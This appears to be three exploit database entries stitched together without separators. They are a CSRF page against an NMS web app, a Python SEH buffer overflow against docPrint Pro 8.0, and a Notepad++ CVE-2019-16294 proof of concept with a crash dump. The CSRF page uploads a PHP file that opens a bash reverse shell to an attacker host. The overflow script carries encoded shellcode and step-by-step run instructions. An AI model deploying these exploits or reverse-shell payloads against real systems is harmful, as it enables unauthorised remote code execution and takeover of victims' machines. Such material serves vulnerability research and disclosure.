(_ )( _)
@Xerubus
The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
<html>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
xhr.withCredentials = true;
var body = "-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"system_upgrade\r\n" +
"-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"action_aux\"\r\n" +
"\r\n" +
"upload_file_complete\r\n" +
"-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" +
"\n" +
"?\x3e\n" +
"\r\n" +
"-----------------------------208051173310446317141640314495\r\n" +
"Content-Disposition: form-data; name=\"upfile_name\"\r\n" +
"\r\n" +
"evil.php\r\n" +
"-----------------------------208051173310446317141640314495--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
</script>
<body onload="submitRequest();" >
</body>
</html>
import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7
# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"
# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)
# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"
# Stack alignment
alignment = "\x54" # push esp
alignment += "\x58" # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50" # push eax
alignment += "\x5c" # pop esp
# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41
# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50" # push eax
# 4F554A42 4F554A42 51554B44
shellcode += zero # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50" # push eax
# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50" # push eax
# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1A27 323A0227 333B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1545 323A1545 333B1545
shellcode += zero # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50" # push eax
# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "\x41" * 2 # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))
# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
# Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file.
# Google Dork: N/A
# Date: 2019-09-14
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://notepad-plus-plus.org/
# Version: < 7.7
# Tested on: Windows x64
# CVE : CVE-2019-16294
# Description:
SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.
Open aaaaa.ml via affected notepad++
POC files:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47393.zip
Result:
(230.c64): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll -
rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa
rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff
rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81
r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9
r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000
r14=0000000000000001 r15=0000000000000002
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
SciLexer!Scintilla_DirectFunction+0x950dd:
00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=????